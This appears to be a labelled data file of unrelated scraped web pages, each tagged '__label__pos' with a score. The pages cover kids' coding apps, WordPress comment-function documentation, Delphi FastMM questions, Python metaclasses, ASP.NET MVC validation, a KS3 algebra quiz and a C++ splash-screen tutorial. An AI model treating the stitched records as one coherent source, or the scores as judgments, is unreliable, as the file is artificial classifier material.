Dinosaur is free, simple, and appeals to even non-techie kids. 3. Think and Learn Code-a-Pillar (Paid, iOS/Android) Code-a-Pillar Image Source: Amazon The Think and Learn Code-a-Pillar by Fisher-Price offers a unique bonus: an app and an offline toy. While it’s an excellent idea to start kids off with hands-on tech and programming edification, too much screen time yields detrimental results. Therefore, the Think and Learn Code-a-Pillar app and its corresponding toy work in conjunction. With the app, kids solve puzzles which present basic computer programming and coding concepts. It’s aimed at younger children, ages 3–6. While there is a Code-a-Pillar toy, the app is standalone. Some of the directions might be slightly challenging for the kiddos. Therefore it’s best if an adult supervises. Though the same can be said about a young age group deciphering the directions to “Candy Land.” Sound effects and the soundtrack may both be turned off. This remains a pleasant touch as it limits possible distractions. Why it’s great: There’s a corresponding physical toy in addition to the standalone app. Plus, music and effects can be turned off for a distraction-free experience. 4. Gamestar Mechanic (Paid, Web) Gamestar Mechanic is a web-based app that teaches kids to make their own videos games. Playing games is enticing, so the promise of game design is appealing to children, moreso than web development or app development. Thus, game design is an excellent foray with a huge payoff: getting to play a game. But since Gamestar Mechanic focuses on game design, it’s decidedly more advanced. Don’t expect simplistic matching games as seen in apps such as Think and Learn Code-a-Pillar. For kids around 7–14, Gamestar Mechanic is perfect. The app boasts courses, game creation, and a play and learn feature with gamification. Quests build game design, and you gain items which you can use to make games. A robust community rounds out Gamestar Mechanic, making it a spectacular coding app for teens and pre-teens. Why it’s great: Gamestar Mechanic aims at a slightly older age group. Game design is a promising and budding sector, so there’s a perfect segue into more advanced programming. 5. Minecraft (Paid) Minecraft is a massively popular game. Its sandbox style makes it highly adaptable. While it’s not necessarily aimed at kids, Minecraft and its all-ages content prominently offers a safe environment for programming. Some mods specifically target children, such as the child-centric LearnToMod mod. You might use Minecraft as an opportunity to teach your children about servers and set up a Linux game server. However, Minecraft is not pre-configured for younger audiences. Adults may need perform a bit of initial set up. But once it’s created, LearnToMod offers a bevy of programming knowledge that’s digestible. There’s a thriving online community. As most of these apps go, Minecraft is pricier. Yet it holds loads of promise with its tutorials which foster real-world programming skills. Minecraft Pi is an awesome medium to get kids modding in Minecraft. Why it’s great: Mods such as the LearnToMod mod teach kids actual coding skills with lessons and instructions. 6. Tynker (Free/Paid, Web) Tynker is a solid app. Its name suggests tinkering, which connotes getting hands on. As such, Tynker teaches programming brilliantly. Like many apps for kids to learn programming, Tynker infuses coding with excitement. As a platform, it boasts a smattering of choices. Kids can code robots and drones, mod Minecraft, build apps and games, or explore STEM. Children begin with code using visual blocks before starting with Python and JavaScript. But along the way, programming centers on projects so there’s an enticing value proposition for kids. Since Tynker starts with visual blocks before moving up to actual code, there’s a clear learning path. A comprehensive environment with levels of increasing advancement makes Tynker one of the best mediums for kids to learn programming. You may also consider the similarly-minded Scratch, which is backed by MIT. Why it’s great: It’s free, and offers paid tiers. Tynker allows kids to make neat projects and grows as kids do. 7. Nancy Drew: Codes & Clues – Mystery Coding Game (Paid, iOS/Android) If there was anything that motivated me to type, it was Mavis Beacon. However, had my mother allowed me a copy of Typing of the Dead, I would likely have preferred that. Perhaps a Coding of the Dead game is in order though maybe not for kids. Similarly, Nancy Drew: Codes & Clues – Mystery Coding Game presents learning with games. Moreover, the Nancy Drew: Codes & Clues game includes a subtle STEM theme with its protagonist. The premise is simple yet effective. There’s a narrative about a tech fair and a mystery to solve. Along the way, kids drag and drop visual code blocks into their proper places. Certain mini-games involve selecting costumes. Goldieblox: Adventures in Coding – The Rocket Cupcake Co. is another stupendous entry-level coding app with a STEM concentration. Because of its balanced gameplay, Nancy Drew is one of the best coding apps for kids to learn programming. Why it’s great: Intuitive, entertain gameplay and STEM themes. The Best Coding Apps for Kids to Learn Programming Although programming might sound incredibly advanced, it’s an excellent idea to get kids started early. These five best coding apps for kids provide a spectacular opportunity for kids to learn programming. Microsoft remains at the forefront of tech, and its Kodu GameLab stands as a solid foray into programming. As a child, I mostly played Oregon Trail II and Math Blaster. As your kids grow older, you may even want to introduce them to these awesome coding games for learning programming. Once you’ve selected the best apps for your kids to learn programming, check out these indestructible and educational tablets for kids. Image Credits: tuthelens/Shutterstock
__label__pos
0.564139
WordPress как на ладони wordpress jino wp_new_comment() WP 1.5.0 Добавляет новый комментарий в Базу Данных. Фильтрует данные. Фильтрует все данные, чтобы убедится что все поля переданы правильно, некоторые поля создаются функцией и их указывать не нужно (IP адресс, User Agent). Задача функции предварительно обработать данные комментария и передать их wp_insert_comment(). Используется в: wp_handle_comment_submission(). Работает на основе: wp_insert_comment() Хуков нет. Возвращает Число/false. ID комментария, который был добавлен. Или false в случае неудачи. Использование wp_new_comment( $commentdata, $avoid_die ); $commentdata(массив) (обязательный) Ассоциативный массив данных комментария. Ключи массива — поля таблицы в БД. Поле comment_ID указывать не нужно — оно создается автоматически. По умолчанию: нет $avoid_die(логический) true = не выполнять wp_die(), а вернуть WP_Error в случае ошибки. C WP 4.7. По умолчанию: false Примеры #1. Пример добавления нового комментария Комментарий будет добавлен к посту 418 и будет ответом на комментарий 315: // создаем массив данных нового комментария $commentdata = array( 'comment_post_ID' => 418, 'comment_author' => 'Проверка', 'comment_author_email' => '[email protected]', 'comment_author_url' => 'http://site.ru', 'comment_content' => 'Текст нового комментария', 'comment_type' => '', 'comment_parent' => 315, 'user_ID' => 0, ); // добавляем данные в Базу Данных wp_new_comment( $commentdata ); #2. Пример добавления комментария с использованием функции wp_insert_comment() В этом случая мы должны сами определить абсолютно все поля комментария: $data = array( 'comment_post_ID' => 1, 'comment_author' => 'admin', 'comment_author_email' => '[email protected]', 'comment_author_url' => 'http://', 'comment_content' => 'текст коммента', 'comment_type' => '', 'comment_parent' => 0, 'user_id' => 1, 'comment_author_IP' => '127.0.0.1', 'comment_agent' => 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)', 'comment_date' => current_time('mysql'), 'comment_approved' => 1, ); wp_insert_comment( $data ); Заметки • Использует хук-событие: comment_post, который передает ID комментария и срабатывает сразу после добавления комментария. • Использует фильтр: preprocess_comment благодаря которому можно изменить данные комментария перед тем как функция начнет их обрабатывать. Код wp new comment: wp-includes/comment.php VER 4.9.1 <?php function wp_new_comment( $commentdata, $avoid_die = false ) { global $wpdb; if ( isset( $commentdata['user_ID'] ) ) { $commentdata['user_id'] = $commentdata['user_ID'] = (int) $commentdata['user_ID']; } $prefiltered_user_id = ( isset( $commentdata['user_id'] ) ) ? (int) $commentdata['user_id'] : 0; /** * Filters a comment's data before it is sanitized and inserted into the database. * * @since 1.5.0 * * @param array $commentdata Comment data. */ $commentdata = apply_filters( 'preprocess_comment', $commentdata ); $commentdata['comment_post_ID'] = (int) $commentdata['comment_post_ID']; if ( isset( $commentdata['user_ID'] ) && $prefiltered_user_id !== (int) $commentdata['user_ID'] ) { $commentdata['user_id'] = $commentdata['user_ID'] = (int) $commentdata['user_ID']; } elseif ( isset( $commentdata['user_id'] ) ) { $commentdata['user_id'] = (int) $commentdata['user_id']; } $commentdata['comment_parent'] = isset($commentdata['comment_parent']) ? absint($commentdata['comment_parent']) : 0; $parent_status = ( 0 < $commentdata['comment_parent'] ) ? wp_get_comment_status($commentdata['comment_parent']) : ''; $commentdata['comment_parent'] = ( 'approved' == $parent_status || 'unapproved' == $parent_status ) ? $commentdata['comment_parent'] : 0; if ( ! isset( $commentdata['comment_author_IP'] ) ) { $commentdata['comment_author_IP'] = $_SERVER['REMOTE_ADDR']; } $commentdata['comment_author_IP'] = preg_replace( '/[^0-9a-fA-F:., ]/', '', $commentdata['comment_author_IP'] ); if ( ! isset( $commentdata['comment_agent'] ) ) { $commentdata['comment_agent'] = isset( $_SERVER['HTTP_USER_AGENT'] ) ? $_SERVER['HTTP_USER_AGENT']: ''; } $commentdata['comment_agent'] = substr( $commentdata['comment_agent'], 0, 254 ); if ( empty( $commentdata['comment_date'] ) ) { $commentdata['comment_date'] = current_time('mysql'); } if ( empty( $commentdata['comment_date_gmt'] ) ) { $commentdata['comment_date_gmt'] = current_time( 'mysql', 1 ); } $commentdata = wp_filter_comment($commentdata); $commentdata['comment_approved'] = wp_allow_comment( $commentdata, $avoid_die ); if ( is_wp_error( $commentdata['comment_approved'] ) ) { return $commentdata['comment_approved']; } $comment_ID = wp_insert_comment($commentdata); if ( ! $comment_ID ) { $fields = array( 'comment_author', 'comment_author_email', 'comment_author_url', 'comment_content' ); foreach ( $fields as $field ) { if ( isset( $commentdata[ $field ] ) ) { $commentdata[ $field ] = $wpdb->strip_invalid_text_for_column( $wpdb->comments, $field, $commentdata[ $field ] ); } } $commentdata = wp_filter_comment( $commentdata ); $commentdata['comment_approved'] = wp_allow_comment( $commentdata, $avoid_die ); if ( is_wp_error( $commentdata['comment_approved'] ) ) { return $commentdata['comment_approved']; } $comment_ID = wp_insert_comment( $commentdata ); if ( ! $comment_ID ) { return false; } } /** * Fires immediately after a comment is inserted into the database. * * @since 1.2.0 * @since 4.5.0 The `$commentdata` parameter was added. * * @param int $comment_ID The comment ID. * @param int|string $comment_approved 1 if the comment is approved, 0 if not, 'spam' if spam. * @param array $commentdata Comment data. */ do_action( 'comment_post', $comment_ID, $commentdata['comment_approved'], $commentdata ); return $comment_ID; } Cвязанные функции Из раздела: Комментарии wp_new_comment 4 комментария • Александр У вас в исходном коде первого примера ошибка в коде - нужно: 'comment_post_ID' => 418 вместо ['comment_post_ID'] => 418 Ответить5.8 лет назад # • Роман cайт: фмл.рф @ А можно ли привязывать комментарий не к посту, а к фото в галерее NEXTGEN GALLERY? Ответить5.7 лет назад # Здравствуйте, ! Ваш комментарий
__label__pos
0.539799
93 votes 2answers 2k views Is there a way to programmatically tell if particular block of memory was not freed by FastMM? I am trying to detect if a block of memory was not freed. Of course, the manager tells me that by dialog box or log file, but what if I would like to store results in a database? For example I would ... 11 votes 4answers 6k views How to get a stack trace from FastMM I've noticed in this post that you can get stack trace out of FastMM to show what appears to be where the object was allocated. ... 7 votes 8answers 4k views Why the Excess Memory for Strings in Delphi? I'm reading in a large text file with 1.4 million lines that is 24 MB in size (average 17 characters a line). I'm using Delphi 2009 and the file is ANSI but gets converted to Unicode upon reading, so ... 6 votes 7answers 4k views How to track down tricky memory leak with fastMM? After upgrading a project from Delphi 2007 to Delphi 2009 I'm getting an Unknown memory leak, so far I've been tryin to track it down using fastMM, here is what fastMM stack trace reports: A memory ...
__label__pos
0.87418
Take the 2-minute tour × Stack Overflow is a question and answer site for professional and enthusiast programmers. It's 100% free, no registration required. I have gone through this: What is a metaclass in Python? But can any one explain more specifically when should I use the meta class concept and when it's very handy? Suppose I have a class like below: class Book(object): CATEGORIES = ['programming','literature','physics'] def _get_book_name(self,book): return book['title'] def _get_category(self, book): for cat in self.CATEGORIES: if book['title'].find(cat) > -1: return cat return "Other" if __name__ == '__main__': b = Book() dummy_book = {'title':'Python Guide of Programming', 'status':'available'} print b._get_category(dummy_book) For this class. In which situation should I use a meta class and why is it useful? Thanks in advance. share|improve this question 12   The First Rule of Metaclasses: If you don't know that you need a metaclass, you don't need a metaclass. –  Ignacio Vazquez-Abrams Apr 28 '12 at 6:28 add comment 5 Answers 5 up vote 0 down vote accepted check the link Meta Class Made Easy to know how and when to use meta class. share|improve this answer add comment You use metaclasses when you want to mutate the class as it is being created. Metaclasses are hardly ever needed, they're hard to debug, and they're difficult to understand -- but occasionally they can make frameworks easier to use. In our 600Kloc code base we've used metaclasses 7 times: ABCMeta once, 4x models.SubfieldBase from Django, and twice a metaclass that makes classes usable as views in Django. As @Ignacio writes, if you don't know that you need a metaclass (and have considered all other options), you don't need a metaclass. share|improve this answer 4   And even if you want to mutate the class, a class decorator is frequently simpler and just as powerful. Only the most advanced manipulations actually benefit from metaclasses. –  delnan Apr 28 '12 at 7:50 add comment A metaclass is used whenever you need to override the default behavior for classes, including their creation. A class gets created from the name, a tuple of bases, and a class dict. You can intercept the creation process to make changes to any of those inputs. You can also override any of the services provided by classes: • __call__ which is used to create instances • __getattribute__ which is used to lookup attributes and methods on a class • __setattr__ which controls setting attributes • __repr__ which controls how the class is diplayed In summary, metaclasses are used when you need to control how classes are created or when you need to alter any of the services provided by classes. share|improve this answer add comment Conceptually, a class exists to define what a set of objects (the instances of the class) have in common. That's all. It allows you to think about the instances of the class according to that shared pattern defined by the class. If every object was different, we wouldn't bother using classes, we'd just use dictionaries. A metaclass is an ordinary class, and it exists for the same reason; to define what is common to its instances. The default metaclass type provides all the normal rules that make classes and instances work the way you're used to, such as: • Attribute lookup on an instance checks the instance followed by its class, followed by all superclasses in MRO order • Calling MyClass(*args, **kwargs) invokes i = MyClass.__new__(MyClass, *args, **kwargs) to get an instance, then invokes i.__init__(*args, **kwargs) to initialise it • A class is created from the definitions in a class block by making all the names bound in the class block into attributes of the class • Etc If you want to have some classes that work differently to normal classes, you can define a metaclass and make your unusual classes instances of the metaclass rather than type. Your metaclass will almost certainly be a subclass of type, because you probably don't want to make your different kind of class completely different; just as you might want to have some sub-set of Books behave a bit differently (say, books that are compilations of other works) and use a subclass of Book rather than a completely different class. If you're not trying to define a way of making some classes work differently to normal classes, then a metaclass is probably not the most appropriate solution. Note that the "classes define how their instances work" is already a very flexible and abstract paradigm; most of the time you do not need to change how classes work. If you google around, you'll see a lot of examples of metaclasses that are really just being used to go do a bunch of stuff around class creation; often automatically processing the class attributes, or finding new ones automatically from somewhere. I wouldn't really call those great uses of metaclasses. They're not changing how classes work, they're just processing some classes. A factory function to create the classes, or a class method that you invoke immediately after class creation, or best of all a class decorator, would be a better way to implement this sort of thing, in my opinion. But occasionally you find yourself writing complex code to get Python's default behaviour of classes to do something conceptually simple, and it actually helps to step "further out" and implement it at the metaclass level. A fairly trivial example is the "singleton pattern", where you have a class of which there can only be one instance; calling the class will return an existing instance if one has already been created. Personally I am against singletons and would not advise their use (I think they're just global variables, cunningly disguised to look like newly created instances in order to be even more likely to cause subtle bugs). But people use them, and there are huge numbers of recipes for making singleton classes using __new__ and __init__. Doing it this way can be a little irritating, mainly because Python wants to call __new__ and then call __init__ on the result of that, so you have to find a way of not having your initialisation code re-run every time someone requests access to the singleton. But wouldn't be easier if we could just tell Python directly what we want to happen when we call the class, rather than trying to set up the things that Python wants to do so that they happen to do what we want in the end? class Singleton(type): def __init__(self, *args, **kwargs): super(Singleton, self).__init__(*args, **kwargs) self.__instance = None def __call__(self, *args, **kwargs): if self.__instance is None: self.__instance = super(Singleton, self).__call__(*args, **kwargs) return self.__instance Under 10 lines, and it turns normal classes into singletons simply by adding __metaclass__ = Singleton, i.e. nothing more than a declaration that they are a singleton. It's just easier to implement this sort of thing at this level, than to hack something out at the class level directly. But for your specific Book class, it doesn't look like you have any need to do anything that would be helped by a metaclass. You really don't need to reach for metaclasses unless you find the normal rules of how classes work are preventing you from doing something that should be simple in a simple way (which is different from "man, I wish I didn't have to type so much for all these classes, I wonder if I could auto-generate the common bits?"). In fact, I have never actually used a metaclass for something real, despite using Python every day at work; all my metaclasses have been toy examples like the above Singleton or else just silly exploration. share|improve this answer add comment If you for whatever reason want to do stuff like Class[x], x in Class etc., you have to use metaclasses: class Meta(type): def __getitem__(cls, x): return x ** 2 def __contains__(cls, x): return int(x ** (0.5)) == x ** 0.5 # Python 2.x class Class(object): __metaclass__ = Meta # Python 3.x class Class(metaclass=Meta): pass print Class[2] print 4 in Class share|improve this answer 3   Want to - but is it the best thing to do? Rarely, if ever. I can't think of any time when I've wanted to do things like this, but even if I had, it would suggest strongly to me that I was doing it the Wrong Way. –  Chris Morgan Apr 28 '12 at 7:53 add comment Your Answer   discard By posting your answer, you agree to the privacy policy and terms of service.
__label__pos
0.932389
Buy me a coffee on ko-fi.com Reese Schultz I'm making my first commercial game. Read more about me here 👋. Spawning Prefabs with Unity ECS How to instantiate copies of a prefab as entities, at runtime, with Unity ECS. unitycsharptutorial Created on November 7, 2019. Last updated on January 26, 2020. Video of spawning prefabs with Unity ECS. Get the tutorial code from GitHub! 👀 Spawning entity-associated prefabs with Unity ECS is a bit complicated, especially if it can occur at any point during your game. Moreover, initiating spawning from other (ECS) systems and even MonoBehaviors complicates matters when it comes to achieving thread safety and conventional usage with the tools provided. Thankfully, none of these challenges will prevent us from achieving our goal. Note: If at any point you find this tutorial to be a little too advanced, don't worry! Try my Getting Started with Unity DOTS tutorial first. Here I'll refer to the to-be-spawned subjects as people. Feel free to call them characters, NPCs, agents, or whatever. Most importantly, we need a way to store their prefab entity data like this: struct PersonPrefab : IComponentData { public Entity Value; } By the way, when thinking in terms of ECS, really there are two modes. There's "authoring" and "runtime." Authoring means to, well, author stuff. That's when we're in the editor, moving things around and adjusting parameters. It also includes conversion of GameObjects into entities upon startup, which are then used for the remainder of the runtime. So, the above component will be referenced in our PersonPrefabAuthoring class, which converts GameObject prefabs into entities with components via the below class: [RequiresEntityConversion] class PersonPrefabAuthoring : MonoBehaviour, IConvertGameObjectToEntity, IDeclareReferencedPrefabs { public GameObject PersonPrefab; public void Convert(Entity entity, EntityManager dstManager, GameObjectConversionSystem conversionSystem) { dstManager.AddComponentData(entity, new PersonPrefab { Value = conversionSystem.GetPrimaryEntity(PersonPrefab) }); } public void DeclareReferencedPrefabs(List<GameObject> referencedPrefabs) { referencedPrefabs.Add(PersonPrefab); } } Now you want to create an empty GameObject in your scene, add the PersonPrefabAuthoring script to it, and finally drag and drop your prefab onto the Person Prefab field. Additionally, in order for the PersonPrefabAuthoring script to work, you will also need to add another script to the same GameObject: the Convert To Entity script. For its Conversion Mode, elect for Convert And Inject Game Object if there are other MonoBehaviours attached to it that you want to keep running after conversion; otherwise, select Convert And Destroy. With a means to convert prefabs, we can use them when enqueuing spawning. Yes, enqueue, meaning we will use a queue data structure. But before we get ahead of ourselves, we'll do a couple things. First, let's create our person data: struct Person : IComponentData { public bool RandomizeTranslation; // This will allow us to optionally randomize the spawn position. } Second, we'll create a struct (but not of IComponentData) that stores the initial data we would want to set on a person, or group of people, from another system or MonoBehaviour: struct PersonSpawn { public Person Person; public Rotation Rotation; public Translation Translation; } The Rotation and Translation components are likely data you'd want to initialize during the spawning process. Why? Because then you have the ability to set the initial rotation via Rotation.Value, and the initial position with Translation.Value. If we want to permit spawning from either a system or MonoBehaviour in a consistent way, we need an accessible public interface for doing so. Since spawning may be requested elsewhere at any time, we must mind thread safety. Thus, the appropriate data structure to cover all of our bases is a ConcurrentQueue of PersonSpawns. Let's instantiate it in a JobComponentSystem. class PersonSpawnSystem : JobComponentSystem { public static readonly int SPAWN_BATCH_MAX = 50; static ConcurrentQueue<PersonSpawn> spawnQueue = new ConcurrentQueue<PersonSpawn>(); EntityCommandBufferSystem barrier => World.GetOrCreateSystem<BeginSimulationEntityCommandBufferSystem>(); public static void Enqueue(PersonSpawn spawn) => spawnQueue.Enqueue(spawn); public static void Enqueue(PersonSpawn[] spawnArray) => Array.ForEach(spawnArray, spawn => { spawnQueue.Enqueue(spawn); }); public static void Enqueue(PersonSpawn spawn, int spawnCount) { for (int i = 0; i < spawnCount; ++i) spawnQueue.Enqueue(spawn); } protected override JobHandle OnUpdate(JobHandle inputDeps) { # TODO } } We've defined SPAWN_BATCH_MAX, setting it to a reasonable integer for batching our spawns in a job we'll create soon. Additionally there's the concurrent queue I mentioned, allowing us to enqueue spawning from any other system or even MonoBehaviour. The queue internally enforces thread safety with a lock. Since it's static, we can call it from a parallel job as long as we give up the right to Burst-compilation, which is fine for this use case. Anyway, opting for composition over inheritance, we expose the queue through overloaded and self-explanatory Enqueue methods. There are three. 1. One overload handles only a single PersonSpawn. 2. Another handles an array of PersonSpawns. 3. The last takes one unit of PersonSpawn data, reusing it to enqueue spawnCount times. You'll notice I additionally snuck in a reference to an EntityCommandBufferSystem, which will queue up all of the operations involved in spawning during the parallel-executing job we have yet to define. Specifically we're using a command buffer that occurs toward the beginning of a frame as opposed to the end, since this is spawning, after all. Anyway, the reference is called barrier because technically it's a memory barrier. Operations performed with the barrier execute deterministically, meaning that they're played back in order. Now let's move on to our job definition: protected override JobHandle OnUpdate(JobHandle inputDeps) { if (spawnQueue.IsEmpty) return inputDeps; var randomArray = World.GetExistingSystem<RandomSystem>().RandomArray; var commandBuffer = barrier.CreateCommandBuffer().ToConcurrent(); var job = inputDeps; for (int i = 0; i < SPAWN_BATCH_MAX; ++i) { job = Entities .WithNativeDisableParallelForRestriction(randomArray) .ForEach((int entityInQueryIndex, int nativeThreadIndex, ref PersonPrefab prefab) => { if ( !spawnQueue.TryDequeue(out PersonSpawn spawn) ) return; var entity = commandBuffer.Instantiate(entityInQueryIndex, prefab.Value); commandBuffer.AddComponent(entityInQueryIndex, entity, spawn.Person); commandBuffer.AddComponent(entityInQueryIndex, entity, spawn.Rotation); commandBuffer.AddComponent(entityInQueryIndex, entity, spawn.Translation); if (!spawn.Person.RandomizeTranslation) return; var random = randomArray[nativeThreadIndex]; commandBuffer.SetComponent(entityInQueryIndex, entity, new Translation { Value = new float3( random.NextInt(-25, 25), 2, random.NextInt(-25, 25) ) }); randomArray[nativeThreadIndex] = random; // This is NECESSARY. }) .WithoutBurst() .WithName("SpawnJob") .Schedule(job); barrier.AddJobHandleForProducer(job); } return job; } First, we check if spawnQueue is empty from the main thread so we don't schedule unnecessary jobs—if we don't, a notable performance impact will be incurred by all the pointless scheduling. Second, we grab a NativeArray of thread-indexed random number generators—and no, the RandomSystem is not a default—I create and explain it my Random Number Generation with Unity DOTS tutorial. All of this code is in my GitHub demo project, and it works! Note we acquire a concurrent EntityCommandBuffer created from the EntityCommandBufferSystem. We want the concurrent flavor of the buffer since we are using a parallel job. The explicit reference to the EntityCommandBufferSystem via the barrier variable is significant, by the way, since, after scheduling the job, we must call AddJobHandleForProducer to inform the barrier system that said job must be completed before the queued commands (hence, command buffer) in the EntityCommandBuffer are played back. In defining our job we have chosen the Entities.ForEach syntactic sugar, saving many lines of code. We iterate over the one and only PersonPrefab that exists, so the semantics of ForEach may make it seem like we're doing more work than we actually are. We must pass the randomArray to WithNativeDisableParallelForRestriction since it's up to us to ensure the safety of our code. Don't worry, it's safe because we're fetching Unity.Mathematics.Randoms from said array with the magic nativeThreadIndex, and writing to them on their own thread, which is kind of like using [ThreadLocal]. Finally, we try to dequeue spawns from the the spawnQueue assuming there are any. We immediately return if not. We instantiate spawns with commandBuffer, and add component data to them as needed. Those with Person.RandomizeTranslation == true will have their Translation components overwritten with fresh, random values via the randomArray. Each Unity.Mathematics.Random within it must maintain state so that each ensuing random number is random-ish, hence the semantics of NextInt, for example. That is why we must write to each of these Randoms with randomArray[nativeThreadIndex] = random. And that should be all you need to know to be dangerous. Call one of the Enqueue overloads to spawn people from either a system or MonoBehaviour at your leisure. The GitHub repo includes glue code for that, which I did not document here. Again, it also includes code for Burst-compilable(!) random number generation. Remember, in this specific instance we're not using Burst since we're directly interacting with a static concurrent queue from the job. Oh, one more thing: you're welcome! Please star my GitHub repo if this tutorial helped you.
__label__pos
0.857277
Take the 2-minute tour × Stack Overflow is a question and answer site for professional and enthusiast programmers. It's 100% free, no registration required. I am creating an application in asp .net mvc3 c#. I create a dropdown list but I am unable to do a client side validation using Jquery. I have looked at numerous articles related to it and know that this is a bug in asp .net mvc3. However, none of the work arounds have worked for my case. My code is below: Entity [Required(ErrorMessage = "Furnishing is required.")] [Display(Name = "Furnishing*")] public int FurnishedType { get; set; } View: <script src="@Url.Content("~/Scripts/jquery-1.8.2.js")" type="text/javascript"></script> <script src="@Url.Content("~/Scripts/jquery.validate.min.js")" type="text/javascript"></script> <script src="@Url.Content("~/Scripts/jquery.validate.unobtrusive.min.js")" type="text/javascript"></script> <div class="editor-label"> @Html.LabelFor(model => model.Property.FurnishedType) @Html.DropDownListFor(model => model.Property.FurnishedType, Model.FurnishedTypes, "--Select One--") </div> <div class="editor-field add-property-error"> @Html.ValidationMessageFor(model => model.Property.FurnishedType) </div> Controller: public ActionResult AddProperty() { AddPropertyViewModel viewModel = new AddPropertyViewModel { ... FurnishedTypes = websiteRepository.GetFurnishedTypeSelectList(-1), ... }; return View(viewModel); } public IEnumerable<SelectListItem> GetFurnishedTypeSelectList(int selectedId) { return db.FurnishedType .OrderBy(x => x.FurnishedTypeDescription) .ToList() .Select(x => new SelectListItem { Value = x.FurnishedTypeId.ToString(), Text = x.FurnishedTypeDescription }); } There is a database which has values as below 1 Furnished 2 Part Furnished ... which is used to populate the select list. Now, this is a required field but I am unable to do a client side validation to see if the user chooses any value? Any help would be grateful share|improve this question      Do you have <add key="ClientValidationEnabled" value="true"/> in your web.config? Can you verify that the <select> has the data-val attributes? –  barry Nov 7 '12 at 21:21 add comment 2 Answers up vote 0 down vote accepted if you assign -1 to "--select one--" There is something should look like this: $(document).ready(function () { $("input[type='submit']").click(function (e) { if($("select").val()==="-1"){ e.preventDefault(); // display error msg beside ddl too } }); } ) share|improve this answer add comment My Suggestion would be to do the following In the View @using (Html.BeginForm("AddProperty", "Home", FormMethod.Post, new { id = "myForm" })) { <div class="editor-label"> @Html.LabelFor(model => model.Property.FurnishedType) @Html.DropDownListFor(model => model.Property.FurnishedType, Model.FurnishedTypes) </div> <div class="editor-field add-property-error"> @Html.ValidationMessageFor(model => model.Property.FurnishedType) </div> } <script type="text/javascript"> $.validator.addMethod('selectNone', function (value, element) { return this.optional(element) || value != -1; }, "Furnishing is required."); $("#myForm").validate({ rules: { FurnishedType: { selectNone: true }} }); </script> In the Controller public IEnumerable<SelectListItem> GetFurnishedTypeSelectList(int selectedId) { List<SelectListItem> Lists = new List<SelectListItem>(); Lists = db.FurnishedType .OrderBy(x => x.FurnishedTypeDescription) .ToList() .Select(x => new SelectListItem { Value = x.FurnishedTypeId.ToString(), Text = x.FurnishedTypeDescription }); Lists.Insert(0, new SelectListItem { Text = "--Select One--", Value = "-1" }); return Lists; } share|improve this answer add comment Your Answer   discard By posting your answer, you agree to the privacy policy and terms of service. Not the answer you're looking for? Browse other questions tagged or ask your own question.
__label__pos
0.628943
UKUK USUSIndiaIndia Join Us Level 5-6 Algebra - Trial and Improvement How many sisters has Louise got? Level 5-6 Algebra - Trial and Improvement When faced with algebra in KS3 Maths you will often have to find the value represented by a letter. This can take quite a bit of working out but the best method to help you is trial and improvement. Trial and Improvement involves intelligent guesswork. You use this method in algebra to work out the value of a letter when there is no obvious other way. The first thing to do is make an intelligent guess as to a letter's value. For example, If x2 = 64 then 5 is too low a value for x and 10 is too high. Let's guess that x = 7. Next we work out the problem using our estimated value. 72 = 49 so 7 is too low. How about 8? Well 82 = 64: success! OK, so not all variables are as easy as that to find but you get the idea. Have a bash at the following quiz to ease you into the process. Take your time and read each question carefully before submitting your answers. Good luck! 1. You are given a value for x within an equation and told that you need to work out the answer by trial and improvement. What is the first thing you do? Try to remember formulas that might help Multiply x by six different numbers Make an intelligent guess at the value of x Move on to the next question Choose a number which you think is likely to be close to the real value 2. After you have made an intelligent guess at the value of x what do you do next? Assume that you guessed correctly Guess another value for x Guess another three values for x Put your guessed value into the equation in place of x Work the answer out. This will tell you whether your guess was too low, too high or exactly right 3. After you have put your guessed value into the equation in place of x what do you do next? Work out the equation using your guessed value Sing a hymn Dance a jig Recite a poem We expect you got that one right! 4. When you work out the equation using your guessed value, you find that your value is too high so what do you do next? Make another guess that is higher than your first Make another guess that is lower than your first Make three more guesses that are higher Make three more guesses that are lower Make one guess at a time and go through all the processes again. Gradually you will narrow it down to the correct answer 5. You are told that Louise has some sisters and, within an equation, the number of sisters she has is represented by x. What would be a good first guess for the value of x? 0 2 10 20 We know that Louise has SOME sisters so we know that 0 sisters is impossible. It is not likely that she has 10 sisters and even less likely that she has 20! 6. Within an equation, the boiling point of a solution is represented by x. What would be a good first guess for the value of x? 50 degrees C 75 degrees C 100 degrees C 200 degrees C 100 degrees C is the boiling point of water and would make a good starting point 7. You are told that the value of x lies somewhere between 300 and 400, and you are given an equation containing x. What would be a good first guess for x? 301 302 350 399 Going to the midway point is usually a good idea - depending on the answer you will then know in which half the answer is 8. x2 + x3 = 80, what is the value of x? 2 3 4 5 2 would be too low and 5 too high so 3 and 4 are good numbers to begin with 9. x3 - 2x = 115, what is the value of x? 3 5 7 9 3 would be too low and 9 too high. I hope you chose 5 or 7 as your original estimate 10. x2 + 4x + 7 = 14x - 9, which of the following is a possible value of x? 3 4 6 8 Each time that you make a guess, record the guess. Then by a process of trial and error you will find the correct answer Author:  Frank Evans © Copyright 2016-2019 - Education Quizzes TJS - Web Design Lincolnshire View Printout in HTML Valid HTML5 We use cookies to make your experience of our website better. To comply with the new e-Privacy directive, we need to ask for your consent - I agree - No thanks - Find out more
__label__pos
0.592692
Animated Multithread Splash A snapshot of the Shutter style splash Splash is useful in many applications, especially in some slow-loading processes. There is a splash screen in Visual C++ ATL, but it has many useless functions and is somehow rigid. So, you can create a flexible splash. To create the multithread splash, you can refer to the article "A Splash Screen with Alpha Blending," written by Leonardo Bernardini. In it, maybe there is something different from my splash class, but they are both based on the same technique. How It Works If you are not interested in it, you can skip this section and go to the next section, where you can learn how to use it. As you can see, the splash screen is in fact a window without a title bar and board. So, you create a window to draw what you want. You derive CUltraSplashWnd from the CWnd class and add a member function to create a real window: The first part creates an invisible window used as the parent so that the splash window won't show in the task bar. Here is the code: BOOL CUltraSplashWnd::Create() { //Create an invisible parent window LPCTSTR pszWndClass = AfxRegisterWndClass(0); m_wndOwner.CreateEx(0, AfxRegisterWndClass(0), _T(""), WS_POPUP, CW_USEDEFAULT, CW_USEDEFAULT, CW_USEDEFAULT, CW_USEDEFAULT, NULL, 0); //Create splash window CreateEx(0, AfxRegisterWndClass(0, AfxGetApp()->LoadStandardCursor(IDC_ARROW)), "UltraSplashWnd", WS_POPUP | WS_VISIBLE, 0, 0, m_bm.bmWidth, //Width of bitmap m_bm.bmHeight, //Height of bitmap m_wndOwner.GetSafeHwnd(), 